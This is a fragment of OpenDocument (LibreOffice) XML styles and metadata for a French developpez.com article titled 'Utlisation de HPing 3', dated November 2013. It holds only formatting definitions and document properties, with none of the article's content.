      <style:paragraph-properties style:page-number="auto" fo:background-color="#ffffcc" style:shadow="none">
        <style:tab-stops/>
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:color="#000000" style:font-name="Courier New" fo:font-size="10pt"/>
    </style:style>
    <style:style style:name="dvp_5f_code_5f_titre" style:display-name="dvp_code_titre" style:family="paragraph" style:next-style-name="Text_20_body">
      <style:paragraph-properties fo:background-color="#9999cc">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:color="#000000" style:font-name="Verdana1" fo:font-size="10pt" fo:font-weight="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fo:background-color="transparent">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:color="#000000" fo:font-size="14pt" fo:font-style="italic" style:font-size-asian="14pt" style:font-style-asian="italic" style:font-size-complex="14pt" style:font-style-complex="italic"/>
    </style:style>
    <style:style style:name="dvp_5f_licence" style:display-name="dvp_licence" style:family="paragraph" style:auto-update="true" style:master-page-name="">
      <style:paragraph-properties fo:text-align="center" style:justify-single-word="false" style:page-number="auto" fo:background-color="#99ccff" fo:padding="0.15cm" fo:border="0.06pt solid #000000" style:shadow="#808080 -0.18cm -0.18cm">
        <style:tab-stops/>
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-size="9pt" style:text-scale="100%"/>
    </style:style>
    <style:style style:name="Illustration" style:family="paragraph" style:parent-style-name="Caption"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499cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
      <style:text-properties style:font-name="DejaVu Sans Mono" fo:font-size="10pt" style:font-name-asian="DejaVu Sans Mono" style:font-size-asian="10pt" style:font-name-complex="DejaVu Sans Mono" style:font-size-complex="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style:style style:name="dvp_5f_exposant" style:display-name="dvp_exposant" style:family="text">
      <style:text-properties style:text-position="super 58%" style:font-name="Verdana" fo:font-size="10pt"/>
    </style:style>
    <style:style style:name="dvp_5f_indice" style:display-name="dvp_indice" style:family="text" style:parent-style-name="dvp_5f_exposant">
      <style:text-properties style:text-position="sub 58%" style:font-name="Verdana" fo:font-size="10pt"/>
    </style:style>
    <style:style style:name="dvp_5f_latex" style:display-name="dvp_latex" style:family="text" style:parent-style-name="dvp_5f_indice">
      <style:text-properties fo:color="#000000" style:text-position="0% 100%" style:font-name="Verdana" fo:font-size="10pt" fo:background-color="#ffcc99"/>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I">
        <style:list-level-properties text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="2" style:num-format="A" text:display-levels="2">
        <style:list-level-properties text:space-before="0.101cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="3" style:num-format="1" text:display-levels="3">
        <style:list-level-properties text:space-before="0.199cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="4" style:num-format="a" text:display-levels="4">
        <style:list-level-properties text:space-before="0.3cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="5" style:num-format="i" text:display-levels="5">
        <style:list-level-properties text:space-before="0.4cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="6" style:num-format="I" text:display-levels="6">
        <style:list-level-properties text:space-before="0.499cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="7" style:num-format="A" text:display-levels="7">
        <style:list-level-properties text:space-before="0.6cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="8" style:num-format="1" text:display-levels="8">
        <style:list-level-properties text:space-before="0.7cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="9" style:num-format="a" text:display-levels="9">
        <style:list-level-properties text:space-before="0.801cm" text:min-label-distance="0.381cm"/>
      </text:outline-level-style>
      <text:outline-level-style text:level="10" style:num-format="i" text:display-levels="10">
        <style:list-level-properties text:space-before="0.9cm"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top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false"/>
      <style:text-properties fo:font-size="8pt" style:font-size-asian="8pt" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="MP3" style:family="paragraph" style:parent-style-name="Footer">
      <style:paragraph-properties fo:margin-top="0cm" fo:margin-bottom="0cm" style:contextual-spacing="false" fo:text-align="center" style:justify-single-word="false"/>
      <style:text-properties fo:font-size="8pt" style:font-size-asian="8pt" style:font-size-complex="8pt"/>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s1" text:anchor-type="paragraph" svg:width="4.154cm" svg:height="0.926cm" draw:z-index="6"><draw:image xlink:href="Pictures/100002000000009D00000023A061FB04.gif" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><svg:title>KitOOoDVP.gif</svg:title></draw:frame></text:p>
      </style:header>
      <style:footer>
        <text:section text:style-name="MSect1" text:name="dvp_sec_licence">
          <text:p text:style-name="MP2"/>
        </text:section>
        <text:p text:style-name="MP3"><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 LibreOffice_project/410m0$Build-4</meta:generator>
    <meta:creation-date>2013-11-11T15:12:00</meta:creation-date>
    <meta:editing-cycles>34</meta:editing-cycles>
    <meta:editing-duration>PT1H18M10S</meta:editing-duration>
    <dc:title>Utlisation de HPing 3</dc:title>
    <dc:description>Ce document est un modèle pour les articles du KitOOoDVP ou le plugin OOo.</dc:description>
    <meta:initial-creator>Neckara </meta:initial-creator>
    <dc:date>2013-11-15T13:37:54.335002224</dc:date>
    <meta:document-statistic meta:table-count="9" meta:image-count="4" meta:object-count="0" meta:page-count="6" meta:paragraph-count="149" meta:word-count="1260" meta:character-count="7858" meta:non-whitespace-character-count="6621"/>
    <meta:user-defined meta:name="Info 1"/>
    <meta:user-defined meta:name="Info 2"/>
    <meta:user-defined meta:name="Info 3"/>
    <meta:user-defined meta:name="Info 4"/>
    <meta:template xlink:type="simple" xlink:actuate="onRequest" xlink:title="Template du KitODT pour developpez.com" xlink:href="../../../../.config/libreoffice/4/user/uno_packages/cache/uno_packages/lug0xjjc.tmp_/KitOOoDVP-L-11.1.oxt/modeles/Developpez/article.ott" meta:date="2013-11-11T15:11:59"/>
  </office:meta>
</office:document-meta>
</file>